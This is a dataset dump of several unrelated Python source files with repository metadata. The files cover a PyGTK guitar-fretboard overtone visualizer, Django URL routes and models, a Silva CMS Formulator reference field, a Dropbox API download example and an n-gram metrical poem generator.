goocanvas.Text(parent=stringcaptions, x=0, y=overtone*self.rectheight, text=name, anchor=gtk.ANCHOR_EAST, font=10) startx = posx + stringcaptions.get_bounds().x2-stringcaptions.get_bounds().x1 + 5 starty = posy + fretcaptions.get_bounds().y2-fretcaptions.get_bounds().y1 fretcaptions.props.x = startx + 0.5*self.rectwidth fretcaptions.props.y = posy stringcaptions.props.x = startx - 5 stringcaptions.props.y = starty + 0.5*self.rectheight # fretboard FretboardBase.construct(self, startx, starty) # analyze # y = self.get_bounds().y2 + 10 # for fret in xrange(0,self.frets+1): # x = startx + self.rectwidth*fret # rect = Semitone(self.control, semitone=self.tuning+fret, method="inharmonicity", parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) # # y += self.rectheight # for fret in xrange(0,self.frets+1): # x = startx + self.rectwidth*fret # rect = Semitone(self.control, semitone=self.tuning+fret, method="lower_dependence", parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) # # y += self.rectheight # for fret in xrange(0,self.frets+1): # x = startx + self.rectwidth*fret # rect = Semitone(self.control, semitone=self.tuning+fret, method="upper_dependence", parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) # # y += self.rectheight # for fret in xrange(0,self.frets+1): # x = startx + self.rectwidth*fret # rect = Semitone(self.control, semitone=self.tuning+fret, method="cumulate", parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) # # y += self.rectheight # for fret in xrange(0,self.frets+1): # x = startx + self.rectwidth*fret # rect = Semitone(self.control, semitone=self.tuning+fret, method="test", parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) # callbacks def open_context_menu(self, rect, event, string, fret): semitone = self.tuning + fret menu = gtk.Menu() item = gtk.MenuItem("Overtones") item.connect("activate", self.open_overtones, item, None, self.strings[string]) menu.append(item) item = gtk.MenuItem("Undertones") item.connect("activate", self.open_undertones, item, None, self.strings[string]) menu.append(item) item = gtk.MenuItem("Analyze") item.connect("activate", self.analyze_semitone, item, None, self.tuning+fret) menu.append(item) item = gtk.MenuItem("Plot") item.connect("activate", self.plot_evolution, item, None, self.strings[string]+fret) menu.append(item) item = gtk.MenuItem("Find onset") item.connect("activate", self.find_onset, item, None, self.strings[string]+fret) menu.append(item) item = gtk.MenuItem("Set equalizer transmissive") item.connect("activate", self.semitone_to_equalizer, item, None, self.strings[string]+fret) menu.append(item) # item = gtk.MenuItem("Add to tabulature") # item.connect("activate", self.add_tab_marker, item, None, string, fret) # menu.append(item) menu.show_all() menu.popup(None, None, None, event.button, event.time) class Undertones(FretboardBase): def __init__(self, control, volume, **kwargs): if "tuning" in kwargs: self.tuning = kwargs["tuning"] del kwargs["tuning"] else: self.tuning = -5 if "undertones" in kwargs: self.undertones = kwargs["undertones"] del kwargs["undertones"] else: self.undertones = 10 if not "rectheight" in kwargs: kwargs["rectheight"] = 10 kwargs["strings"] = [] for divisor in xrange(1,self.undertones+2): semitone = self.tuning + 12.*numpy.log2(1./divisor) kwargs["strings"].append(semitone) if "method" in kwargs: if not kwargs["method"] in ["gradient","cumulate"]: raise ValueError, "invalid method for Undertones" FretboardBase.__init__(self, control, volume, **kwargs) def construct(self, posx, posy): # captions fretcaptions = goocanvas.Group(parent=self) for fret in xrange(1,self.frets+1): goocanvas.Text(parent=fretcaptions, x=fret*self.rectwidth, y=0, text=str(fret), anchor=gtk.ANCHOR_NORTH, font=10) stringcaptions = goocanvas.Group(parent=self) goocanvas.Text(parent=stringcaptions, x=0, y=0, text="f.", anchor=gtk.ANCHOR_EAST, font=10) for undertone in xrange(1,self.undertones+1): name = "-"+str(undertone)+"." goocanvas.Text(parent=stringcaptions, x=0, y=undertone*self.rectheight, text=name, anchor=gtk.ANCHOR_EAST, font=10) startx = posx + stringcaptions.get_bounds().x2-stringcaptions.get_bounds().x1 + 5 starty = posy + fretcaptions.get_bounds().y2-fretcaptions.get_bounds().y1 fretcaptions.props.x = startx + 0.5*self.rectwidth fretcaptions.props.y = posy stringcaptions.props.x = startx - 5 stringcaptions.props.y = starty + 0.5*self.rectheight # fretboard FretboardBase.construct(self, startx, starty) # analyze # y = self.get_bounds().y2 + 10 # for fret in xrange(0,self.frets+1): # x = startx + self.rectwidth*fret # rect = Semitone(self.control, semitone=self.tuning+fret, method="inharmonicity", parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) # # y += self.rectheight # for fret in xrange(0,self.frets+1): # x = startx + self.rectwidth*fret # rect = Semitone(self.control, semitone=self.tuning+fret, method="lower_dependence", parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) # # y += self.rectheight # for fret in xrange(0,self.frets+1): # x = startx + self.rectwidth*fret # rect = Semitone(self.control, semitone=self.tuning+fret, method="upper_dependence", parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) # # y += self.rectheight # for fret in xrange(0,self.frets+1): # x = startx + self.rectwidth*fret # rect = Semitone(self.control, semitone=self.tuning+fret, method="cumulate", parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) # # y += self.rectheight # for fret in xrange(0,self.frets+1): # x = startx + self.rectwidth*fret # rect = Semitone(self.control, semitone=self.tuning+fret, method="test", parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) # callbacks def open_context_menu(self, rect, event, string, fret): semitone = self.tuning + fret menu = gtk.Menu() item = gtk.MenuItem("Overtones") item.connect("activate", self.open_overtones, item, None, self.strings[string]) menu.append(item) item = gtk.MenuItem("Undertones") item.connect("activate", self.open_undertones, item, None, self.strings[string]) menu.append(item) item = gtk.MenuItem("Analyze") item.connect("activate", self.analyze_semitone, item, None, self.tuning+fret) menu.append(item) item = gtk.MenuItem("Plot") item.connect("activate", self.plot_evolution, item, None, self.strings[string]+fret) menu.append(item) item = gtk.MenuItem("Find onset") item.connect("activate", self.find_onset, item, None, self.strings[string]+fret) menu.append(item) item = gtk.MenuItem("Set equalizer transmissive") item.connect("activate", self.semitone_to_equalizer, item, None, self.strings[string]+fret) menu.append(item) # item = gtk.MenuItem("Add to tabulature") # item.connect("activate", self.add_tab_marker, item, None, string, fret) # menu.append(item) menu.show_all() menu.popup(None, None, None, event.button, event.time) class FretboardWindowBase(gtk.Window): def __init__(self, **kwargs): gtk.Window.__init__(self, **kwargs) vbox = gtk.VBox() self.add(vbox) self.controls = gtk.VBox() vbox.add(self.controls) hbox = gtk.HBox() vbox.add(hbox) label = gtk.Label("Volume") hbox.add(label) self.volume = gtk.Adjustment(0.04,0.0,10.0,0.01) spinbtn = gtk.SpinButton(self.volume,0.01,2) hbox.add(spinbtn) self.canvas = goocanvas.Canvas() self.connect_after("realize", self.set_default_background, self.canvas) self.canvas.set_property("has-tooltip", True) vbox.add(self.canvas) self.connect("delete-event", self.stop_playing) def stop_playing(self, *args): self.visualizer.pipeline.set_state(gst.STATE_NULL) def adjust_canvas_size(self): width = self.visualizer.get_width() height = self.visualizer.get_height() self.canvas.set_bounds(0,0,width,height) self.canvas.set_size_request(int(width),int(height)) def set_default_background(self, from_widget, to_widget): # background color is only available when widget is realized color = from_widget.get_style().bg[gtk.STATE_NORMAL] to_widget.set_property("background_color", color) class FretboardWindow(FretboardWindowBase): def __init__(self, control, **kwargs): FretboardWindowBase.__init__(self, **kwargs) self.set_title("Fretboard") root = self.canvas.get_root_item() self.visualizer = Fretboard(control, self.volume, parent=root) self.adjust_canvas_size() hbox = gtk.HBox() self.controls.add(hbox) label = gtk.Label("Method") hbox.add(label) combobox = gtk.combo_box_new_text() # string = self.project.timeline.tabulature.strings[i] # combobox.append_text(str(i+1)+" ("+str(string.tuning)+")") combobox.set_active(0) class OvertoneWindow(FretboardWindowBase): def __init__(self, control, tuning=-5, **kwargs): FretboardWindowBase.__init__(self, **kwargs) self.set_title("Overtones of %s-tuned string (%f - %f Hz)" % (Math.note_name(tuning), tuning, Math.semitone_to_frequency(tuning))) root = self.canvas.get_root_item() self.visualizer = Overtones(control, self.volume, parent=root, tuning=tuning) self.adjust_canvas_size() class UndertoneWindow(FretboardWindowBase): def __init__(self, control, tuning=-5, **kwargs): FretboardWindowBase.__init__(self, **kwargs) self.set_title("Undertones of %s-tuned string (%f - %f Hz)" % (Math.note_name(tuning), tuning, Math.semitone_to_frequency(tuning))) root = self.canvas.get_root_item() self.visualizer = Undertones(control, self.volume, parent=root, tuning=tuning) self.adjust_canvas_size()
UTF-8
Python
false
false
2,010
8,924,942,045,904
dd2c8b44fb05f9459234414cbf550684a5b6ee74
c4dd89e1175753469b442745d5ea910d4f71c8c3
/cocoa_cash/urls.py
b7d8c073bdebc4c171dc2db94054cb7fd16405f9
[]
no_license
samba6/saanu-proj
https://github.com/samba6/saanu-proj
bfee7b15d414a5923a4a677bc5c377fed0a3d69f
a83311e298e7840cfa7f59b5003a964a24ee7ca6
refs/heads/master
2016-08-08T06:26:24.671102
2014-08-01T00:02:30
2014-08-01T00:02:30
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.conf .urls import url, patterns from cocoa_cash import views withdraw_cash_from_bank_list = views.WithdrawCashFromBankViewSet.as_view({ 'get': 'list', 'post': 'create', }) withdraw_cash_from_bank_detail = views.WithdrawCashFromBankViewSet.as_view({ 'get': 'retrieve', 'put': 'update', 'patch': 'partial_update', 'delete': 'destroy' }) withdraw_cash_from_bank_home = views.WithdrawCashFromBankViewSet.as_view({ 'get': 'render_create_form' }) urlpatterns = patterns( '', url(r'^receive-coy-money/$', withdraw_cash_from_bank_list, name='withdrawcashfrombank-list',), url(r'^receive-coy-money/(?P<pk>\d+)/$', withdraw_cash_from_bank_detail, name='withdrawcashfrombank-detail',), url(r'^create-receive-coy-money/$', withdraw_cash_from_bank_home, name='withdrawcashfrombank-home') ) advance_cash_to_customer_list = views.AdvanceCashToCustomerViewSet.as_view({ 'get': 'list', 'post': 'create', }) advance_cash_to_customer_detail = views.AdvanceCashToCustomerViewSet.as_view({ 'get': 'retrieve', 'put': 'update', 'patch': 'partial_update', 'delete': 'destroy' }) advance_cash_to_customer_home = views.AdvanceCashToCustomerViewSet.as_view({ 'get': 'advance_cash_to_customer_home' }) urlpatterns += patterns( '', url(r'^advance-cash-to-customer/$', advance_cash_to_customer_list, name='advancecashtocustomer-list',), url(r'^advance-cash-to-customer/(?P<pk>\d+)/$', advance_cash_to_customer_detail, name='advancecashtocustomer-detail',), url(r'^advance-cash-to-customer/home/$', advance_cash_to_customer_home, name='advancecashtocustomer-home',), ) cocoa_from_customer_list = views.CocoaFromCustomerViewSet.as_view({ 'get': 'list', 'post': 'create', }) cocoa_from_customer_detail = views.CocoaFromCustomerViewSet.as_view({ 'get': 'retrieve', 'put': 'update', 'delete': 'destroy', 'patch': 'partial_update', }) cocoa_from_customer_home = views.CocoaFromCustomerViewSet.as_view({ 'get': 'cocoa_from_customer_home', }) urlpatterns += patterns( '', url(r'^cocoa-from-customer/$', cocoa_from_customer_list, name='cocoafromcustomer-list'), url(r'^cocoa-from-customer/(?P<pk>\d+)/$', cocoa_from_customer_detail, name='cocoafromcustomer-detail'), url(r'^cocoa-from-customer/home/$', cocoa_from_customer_home, name='cocoafromcustomer-home'), )
UTF-8
Python
false
false
2,014
5,351,529,268,924
b33c116799cdc23e9fb2bc8c68cbfab240ecc9e6
259640b40d46d4fe1386c1d7d78799aef5f59502
/tests/integration/__init__.py
576abe33915d751d5757b7e8cc86388a89730ece
[]
no_license
thedrow/nose2-testsuite
https://github.com/thedrow/nose2-testsuite
7e78c6586f11f76b0ff36ed3b4d96b8e6ea23e93
17b7124bdb660890de0c0dd7ec0a01961376f9a7
refs/heads/master
2016-09-15T18:27:12.951878
2013-06-20T21:36:02
2013-06-20T21:36:02
9,029,600
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
class IntegrationTestsLayer(object): pass
UTF-8
Python
false
false
2,013
3,435,973,862,934
859579e990604d3c9fb8b5ff13505eeeb4dae613
4357b8f9900ac01108dab3f558f93779ac5eedfd
/src/silva/core/references/widgets/formulator.py
aa2048ee2b003b1c8bc2cc27e1e7d301bddb1c4d
[]
no_license
silvacms/silva.core.references
https://github.com/silvacms/silva.core.references
a5f8c0ac5f0cf9c02ea3a7cbe383ae9ade3839a5
0fc71f32e1a38105537d212398f8131dddfeb163
refs/heads/master
2016-09-06T10:42:36.811219
2013-12-18T15:07:27
2013-12-18T15:07:27
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding: utf-8 -*- # Copyright (c) 2010-2013 Infrae. All rights reserved. # See also LICENSE.txt import uuid import logging from Acquisition import aq_parent import AccessControl from zeam.form.silva.datamanager import FieldValueWriter from zeam.form.silva.datamanager import FieldValueReader from Products.Formulator.Field import ZMIField from Products.Formulator.FieldRegistry import FieldRegistry from Products.Formulator.Validator import Validator from Products.Formulator.Widget import Widget from Products.Formulator.DummyField import fields from grokcore.chameleon.components import ChameleonPageTemplate from zope.interface import Interface from zeam import component from silva.core.interfaces import ISilvaObject from silva.core.interfaces.errors import ExternalReferenceError from silva.core.references.reference import ReferenceSet from silva.core.references.reference import get_content_from_id from silva.core.references.utils import relative_path from silva.core.references.utils import is_inside_container from silva.core.references.utils import canonical_path from silva.core.references.widgets import ReferenceInfoResolver from silva.translations import translate as _ _marker = object() logger = logging.getLogger('silva.core.references') NS_REFERENCES = "http://infrae.com/namespace/silva-references" def get_request(): """Return the request when you are lost. """ manager = AccessControl.getSecurityManager() return manager.getUser().REQUEST class ReferencesSolver(object): """Object used to delay the references resolving in deserializeValue: - This object is returned instead of the target of the reference duing the deserialization. - Required setting and callback used to set the resolved references are collecting then this object is saved in Formulator. - The reference is resolved and effectively set when is the import of all the others content are done. """ def __init__(self, producer, field): self._id = field.getId() self._importer = producer.getExtra() self._context = None self._contents = [] self._expected = 0 self._callback = None self._single = True def report(self, message): self._importer.reportProblem( "Error in field '{0}': {1}".format(self._id, message), self._context) def defer(self, callback, single, context): assert self._callback is None, 'Defer called twice' self._callback = callback self._single = single self._context = context def add(self, path): self._importer.addAction(self.resolve, [path]) self._expected += 1 def resolve(self, path): if path: imported_path = self._importer.getImportedPath(canonical_path(path)) if imported_path is not None: path = map(str, imported_path.split('/')) try: target = self._importer.root.unrestrictedTraverse(path) except (AttributeError, KeyError): self.report( 'Could not traverse imported path {0}.'.format(path)) self._contents.append(target) else: self.report( 'Could not resolve imported path {0}.'.format(path)) else: self.report('Broken reference.') self._expected -= 1 if not self._expected and self._callback is not None: if self._single: if self._contents: if len(self._contents) != 1: self.reportProblem( 'Found multiple paths where only one was expected.') self._callback(self._contents[0]) else: self._callback(self._contents) class ReferenceValidator(Validator): """Extract and validate a reference. """ property_names = Validator.property_names + [ 'required'] message_names = Validator.message_names + [ 'required_not_found', 'invalid_value'] required = fields.CheckBoxField( 'required', title='Required', description=( u"Checked if the field is required; the user has to fill in some " u"data."), default=1) required_not_found = u"Input is required but no input given." invalid_value = u"Input is incorrect" def validate(self, field, key, REQUEST): multiple = bool(field.get_value('multiple')) value = REQUEST.form.get(key, None) def convert(identifier): try: content = get_content_from_id(int(identifier)) except ValueError: self.raise_error('invalid_value', field) if ISilvaObject.providedBy(content): return content return None if value: if multiple: if not isinstance(value, list): value = [value] value = filter(lambda v: v is not None, map(convert, value)) if len(value): return value else: value = convert(value) if value is not None: return value if field.get_value('required'): self.raise_error('required_not_found', field) return value def serializeValue(self, field, value, producer): if not value: return handler = producer.getHandler() options = handler.getOptions() if options.external_rendering: return if not bool(field.get_value('multiple')): value = [value] exported = handler.getExported() producer.startPrefixMapping(None, NS_REFERENCES) for target in value: if value is not None: if is_inside_container(exported.root, target): target_path = [exported.root.getId()] + relative_path( exported.rootPath, target.getPhysicalPath()) producer.startElement('path') producer.characters(canonical_path('/'.join(target_path))) producer.endElement('path') else: if options.external_references: exported.reportProblem( (u"A reference field '{0}' refers to an " + u'content outside of the export ({1}).').format( field.getId(), '/'.join(relative_path( exported.rootPath, target.getPhysicalPath()))), producer.context) producer.startElement('path') producer.endElement('path') else: raise ExternalReferenceError( _(u"External reference"), producer.context, target, exported.root) producer.endPrefixMapping(None) def deserializeValue(self, field, value, context): # value should be an lxml node solver = ReferencesSolver(context, field) for entry in value.xpath('ref:path', namespaces={'ref': NS_REFERENCES}): solver.add(entry.text) return solver class ValueInfo(object): pass class BoundReferenceWidget(object): """Render a widget. """ template = ChameleonPageTemplate( filename='formulator_templates/reference_input.cpt') def __init__(self, context, request, field, value): self.context = context self.request = request # For security self.__parent__ = context # For the widget self.id = field.generate_field_html_id() self.name = field.generate_field_key() self.title = field.title() self.multiple = bool(field.get_value('multiple')) self.required = bool(field.get_value('required')) css_class = [] if self.multiple: css_class.append('field-multiple') if self.required: css_class.append('field-required') self.css_class = ' '.join(css_class) or None self.value = None self.value_id = None self.extra_values = [] resolver = ReferenceInfoResolver( self.request, self.context, self, multiple=self.multiple, message=field.get_value('default_msg') or _(u"No content selected.")) resolver.update( interface=field.get_interface(), show_index=field.get_value('show_container_index')) if self.multiple: self.values = [] # Support for one value list from the request (string are lists...). if isinstance(value, basestring) or not isinstance(value, list): if value: value = [value] else: value = [] # Go through each value and prepare information for item in value: info = ValueInfo() if isinstance(item, (basestring, int)): resolver.add(value_id=item, sub_widget=info) else: resolver.add(value=item, sub_widget=info) self.values.append(info) self.value = len(self.values) and self.values[0] or None self.extra_values = len(self.values) and self.values[1:] or [] else: # Prepare information self.value = ValueInfo() if isinstance(value, (basestring, int)): resolver.add(value_id=value, sub_widget=self.value) else: resolver.add(value=value, sub_widget=self.value) # Shortcut for template. if self.value is not None: self.value_id = self.value.value_id def default_namespace(self): return {'context': self.context, 'request': self.request, 'view': self} def namespace(self): return {} def __call__(self): return self.template.render(self) class ReferenceWidget(Widget): """Widget to select a reference. """ property_names = Widget.property_names + [ 'interface', 'multiple', 'default_msg', 'show_container_index'] default = fields.ReferenceField( 'default', title=u'Default', description=u'Default value (not supported, required by Formulator).', default='', required=0) interface = fields.InterfaceField( 'interface', title=u'Interface', description=u'Interface that selected contents must comply with.', default=ISilvaObject, required=1) multiple = fields.CheckBoxField( 'multiple', title='Multiple', description=(u'If checked, multiple contents can be selected as target ' u'of the reference'), default=0, required=1) show_container_index = fields.CheckBoxField( 'show_container_index', title="Show containers index", description=(u"Allows to select containers index as target. " u"In most cases it is not needed; choosing the container " u"itself is preferred."), default=0, required=1) default_msg = fields.StringField( 'default_msg', title=u'Default Message', description=(u'Default message displayed to the user if ' u'the field is empty.'), default='', required=0) view_separator = fields.StringField( 'view_separator', title='View separator', description=( "When called with render_view, this separator will be used to " "render individual items."), width=20, default='<br />\n', whitespace_preserve=1, required=1) def render(self, field, key, value, REQUEST): # REQUEST is None. So hack to find it again. # The context of the form is the acquisition context of this form. context = aq_parent(field) if context is None: return u'<p>Not available.</p>' request = get_request() if isinstance(value, basestring) and not len(value): # This correspond to empty. However Formulator have # problems with that concept. value = None widget = BoundReferenceWidget(context, request, field, value) return widget() def render_view(self, field, value): def render_value(value): return value.get_title_or_id() if not field.get_value('multiple'): value = [value] try: separator = str(field.get_value('view_separator')) except KeyError: separator = '<br />\n' return separator.join(map(render_value, value)) class ReferenceField(ZMIField): """Formulator reference field. """ meta_type = "ReferenceField" widget = ReferenceWidget() validator = ReferenceValidator() def get_interface(self): try: interface = self.get_value('interface') except KeyError: interface = ISilvaObject return interface.__identifier__ # This get initialized by Grok and register the formulator widget FieldRegistry.registerField(ReferenceField, 'www/BasicField.gif') class ReferenceValueWriter(FieldValueWriter): component.adapts(ReferenceField, Interface) def __init__(self, *args): super(ReferenceValueWriter, self).__init__(*args) self.context = self.form.context def delete(self): if self.identifier in self.content.__dict__: identifier = self.content.__dict__[self.identifier] references = ReferenceSet(self.context, identifier) references.set([]) del self.content.__dict__[self.identifier] def __call__(self, value): multiple = bool(self.field._field.get_value('multiple')) if isinstance(value, ReferencesSolver): value.defer(self.__call__, not multiple, self.context) return if value is None: value = [] elif multiple: assert isinstance(value, list) else: assert ISilvaObject.providedBy(value) value = [value] if self.identifier in self.content.__dict__: identifier = self.content.__dict__[self.identifier] else: identifier = unicode(uuid.uuid1()) self.content.__dict__[self.identifier] = identifier self.content._p_changed = True references = ReferenceSet(self.context, identifier) references.set(value) class ReferenceValueReader(FieldValueReader): component.adapts(ReferenceField, Interface) def __init__(self, *args): super(ReferenceValueReader, self).__init__(*args) self.context = self.form.context def __call__(self, default=None): if self.identifier in self.content.__dict__: identifier = self.content.__dict__[self.identifier] references = list(ReferenceSet(self.context, identifier)) if len(references): if self.field._field.get_value('multiple'): return references return references[0] return default
UTF-8
Python
false
false
2,013
6,356,551,619,435
d439102f0f855b16ef2c73a5ab3f9b0d4a6f6c3f
9a3292433bca817a10fc0ad84c3e91441ec4ea00
/app/models.py
4051079da9a3860341376ace3b13f04adda8d480
[]
no_license
sw-iknow/toknow2
https://github.com/sw-iknow/toknow2
0653c31ee146a6ee3c73731a70cc362e01830163
5732b13cb88ea206321e912f1f40afbceec50fd0
refs/heads/master
2020-05-19T07:56:29.603111
2014-04-06T16:00:40
2014-04-06T16:00:40
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.db import models from django.contrib.auth.models import User class UserInfo(models.Model): message = models.CharField(max_length=200) authuser_id = models.ForeignKey(User) class SkillType(models.Model): level = models.IntegerField() parent_id = models.ForeignKey("self", null=True) name = models.CharField(max_length=200) url = models.CharField(max_length=200) class SkillInstance(models.Model): user_id = models.ForeignKey(UserInfo) skill_type_id = models.ForeignKey(SkillType) instance_type = models.CharField(max_length=30) snippet = models.CharField(max_length=200) class Hookup(models.Model): requester_id = models.ForeignKey(UserInfo, related_name='requester_hookups') offerer_id = models.ForeignKey(UserInfo, related_name='offerer_hookups') rating = models.IntegerField() date = models.DateField()
UTF-8
Python
false
false
2,014
893,353,209,154
456d218a9eb8234bb1041c4b0b93942ce77e26e6
219bda07dd412489b2458d9832b6a75efa722801
/Dropbox_API/dropbox_api_4_descargar_archivos.py
d806a51d3078e601c945f14491ce88359fd27883
[]
no_license
LuqueDaniel/Experimentos_Python
https://github.com/LuqueDaniel/Experimentos_Python
9834304f7e03fe844bec4d4303eaaeb42f808c0e
97d4ca94d62e67f5d55f829f06bc4a0065edf67c
refs/heads/master
2021-01-25T04:53:04.575600
2014-02-14T12:44:26
2014-02-14T12:44:26
3,506,849
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#encoding: utf-8 from dropbox import client, session, rest app_key = '' #APP KEY app_secret = '' #APP_SECRET app_type = 'app_folder' sesion = session.DropboxSession(app_key, app_secret, app_type) request_token = sesion.obtain_request_token() url = sesion.build_authorize_url(request_token) print "url:", url print "Visite la URL de arriba y permita la aplicación, a continuación presione intro" raw_input() access_token = sesion.obtain_access_token(request_token) cliente = client.DropboxClient(sesion) file_drop, metadata = cliente.get_file_and_metadata('/url.txt') file_local = open('file_url.txt', 'w') file_local.write(file_drop.read()) print(metadata)
UTF-8
Python
false
false
2,014
15,238,543,966,425
26c790b0cdb09a22ee999065d0bd27dbd35637f8
c9f8f0a2f22dba5e800eb70ddba8da01cf6b97e0
/versifier.py
3e3716d22ea791496b17efcd9c1898dcc52a8127
[]
no_license
jeffbinder/versifier
https://github.com/jeffbinder/versifier
a13c8d0d5a28e640cbe4ac7c6e49acb7e267660c
032c6211fa5f4c9755c8f61ccec7254ea0392e68
refs/heads/master
2016-09-08T01:11:55.797779
2014-07-14T02:17:06
2014-07-14T02:17:06
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import pickle import random import re import unicodedata n = 2 from nltk.corpus import cmudict dictionary = cmudict.dict() from nltk.corpus import stopwords stopwords = stopwords.words('english') vowel_cluster = re.compile('[aeiouyAEIOUY]+') word = re.compile(r'\w[\w\']*|\'\w[\w\']*') def remove_accents(str): nkfd_form = unicodedata.normalize('NFKD', str) return u''.join([c for c in nkfd_form if not unicodedata.combining(c)]) def get_nsyls(tok): if not word.match(tok): return 0 if not tok in dictionary: num_vowel_clusters = vowel_cluster.findall(remove_accents(tok)) nsyls = len(num_vowel_clusters) if nsyls == 0: nsyls = 1 return nsyls pron = dictionary[tok][0] nsyls = sum(1 for ph in pron if ph[-1].isdigit()) return nsyls def get_meter(tok): if not word.match(tok): return '' if not tok in dictionary: return None pron = dictionary[tok][0] meter = '' for ph in pron: if ph[-1].isdigit(): meter += 'u' if ph[-1] == '0' else '-' return meter def get_rhyme(tok): if not tok in dictionary: return None pron = dictionary[tok][0] rhyme = '' for ph in pron: if ph[-1].isdigit(): rhyme = ph else: rhyme += ph return rhyme def validate_punct(tok, desired_meter, punct_permitted, desired_rhyme): if tok in ('$', '{', '}', '(', ')', '[', ']') or tok.isdigit(): return False if word.match(tok): return False return punct_permitted def validate_word(tok, desired_meter, punct_permitted, desired_rhyme): if tok.isdigit(): return False if not word.match(tok): return False meter = get_meter(tok) if meter: if not desired_meter.startswith(meter): return False nsyls = len(meter) else: return False # Alternative: just check the estimated number of syllables and ignore # meter for words not in the dictionary. #nsyls = get_nsyls(tok) #if '|' in desired_meter[:nsyls]: # return False if (len(desired_meter) <= nsyls or desired_meter[nsyls] == '|') and desired_rhyme: if tok in stopwords: return False rhyme = get_rhyme(tok) if desired_rhyme is True: return rhyme is not None else: rhyme_pattern, prohibited_words = desired_rhyme return rhyme == rhyme_pattern and tok not in prohibited_words return True def get_next_tok(c, corpus_id, last_toks, desired_meter, punct_permitted, desired_rhyme): if len(last_toks) == 2: c.execute('''SELECT tok3, count FROM trigram WHERE corpus_id = %s AND tok1 = %s AND tok2 = %s''', (corpus_id, last_toks[0], last_toks[1])) elif len(last_toks) == 1: c.execute('''SELECT tok2, count FROM bigram WHERE corpus_id = %s AND tok1 = %s''', (corpus_id, last_toks[0])) elif len(last_toks) == 0: c.execute('''SELECT tok1, count FROM unigram WHERE corpus_id = %s''', (corpus_id,)) if not c.rowcount: return get_next_tok(c, corpus_id, last_toks[1:], desired_meter, punct_permitted, desired_rhyme) d = dict(c.fetchall()) # First determine whether there will be a punctuation mark next. punct_options = [tok for tok in d if validate_punct(tok, desired_meter, punct_permitted, desired_rhyme)] total = sum(d[x] for x in d) probs = [] p1 = 0.0 for tok2 in punct_options: p2 = p1 + float(d[tok2]) / total probs.append((tok2, p1, p2)) p1 = p2 probs.append((None, p1, 1.0)) x = random.random() for tok, p1, p2 in probs: if x >= p1 and x < p2: break if tok: return tok, desired_meter # If a punctuation mark wasn't selected, try to find a word to use. word_options = [tok for tok in d if validate_word(tok, desired_meter, punct_permitted, desired_rhyme)] if not word_options: if len(last_toks) == 0: return None else: return get_next_tok(c, corpus_id, last_toks[1:], desired_meter, punct_permitted, desired_rhyme) total = sum(d[x] for x in word_options) probs = [] p1 = 0.0 for tok2 in word_options: p2 = p1 + float(d[tok2]) / total probs.append((tok2, p1, p2)) p1 = p2 x = random.random() for tok, p1, p2 in probs: if x >= p1 and x < p2: break nsyls = get_nsyls(tok) return tok, desired_meter[nsyls:] def generate_poem(c, corpus_id, meter, rhyme_scheme, max_len, gen_html=False): remaining_meter = meter remaining_rhyme_scheme = rhyme_scheme last_toks = ('$',) * n start_of_line = True start_of_sentence = True punctuation_permitted = False hyphen_before = False rhymes = {} poem = '' while remaining_meter: if remaining_meter.startswith('|'): # Used when there is an empty line. poem += '<br/>' if gen_html else '\n' remaining_meter = remaining_meter[1:] start_of_line = True if remaining_rhyme_scheme: rhyme_type = remaining_rhyme_scheme[0] desired_rhyme = rhymes.get(rhyme_type, True) else: desired_rhyme = False result = get_next_tok(c, corpus_id, last_toks, remaining_meter, punctuation_permitted and not start_of_line, desired_rhyme) if result: tok, remaining_meter = result else: return generate_poem(c, corpus_id, meter, rhyme_scheme, max_len, gen_html) if word.match(tok): punctuation_permitted = True else: punctuation_permitted = False if not start_of_line and not hyphen_before and word.match(tok): poem += ' ' if start_of_sentence: if tok.startswith('\''): poem += '\'' + tok[1:].capitalize() else: poem += tok.capitalize() elif tok == 'i': poem += 'I' elif tok.startswith('i\''): poem += tok.capitalize() else: poem += tok if tok in ('.', '!', '?'): start_of_sentence = True else: start_of_sentence = False if tok.endswith('-'): hyphen_before = True else: hyphen_before = False if remaining_meter.startswith('|'): if rhyme_type in rhymes: rhyme, prohibited_words = rhymes[rhyme_type] rhymes[rhyme_type] = (rhyme, prohibited_words + [tok]) else: rhymes[rhyme_type] = (get_rhyme(tok), [tok]) poem += '<br/>' if gen_html else '\n' remaining_meter = remaining_meter[1:] remaining_rhyme_scheme = remaining_rhyme_scheme[1:] start_of_line = True else: start_of_line = False if max_len is not None and len(poem) > max_len - 1: return generate_poem(c, corpus_id, meter, rhyme_scheme, max_len, gen_html) last_toks = tuple(last_toks[i+1] if i < n - 1 else tok for i in xrange(n)) return poem + '.'
UTF-8
Python
false
false
2,014
13,305,808,687,385
895f9eead35db05078bbe9b0653d911e962d2528
292a88ec6d7ec5943b4df3f4f549d28aacdbc233
/md_sync.py
7e204e96206a9e3fbbf01e27d524ef687faa7037
[]
no_license
liyunhai/res-auto
https://github.com/liyunhai/res-auto
e902cfa532dbaa27d0133849abc124f0ac7ff952
1552752fd637ccaac758830113d417a7cf3712b0
refs/heads/master
2020-06-03T10:52:38.706232
2013-10-15T07:01:00
2013-10-15T07:01:00
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
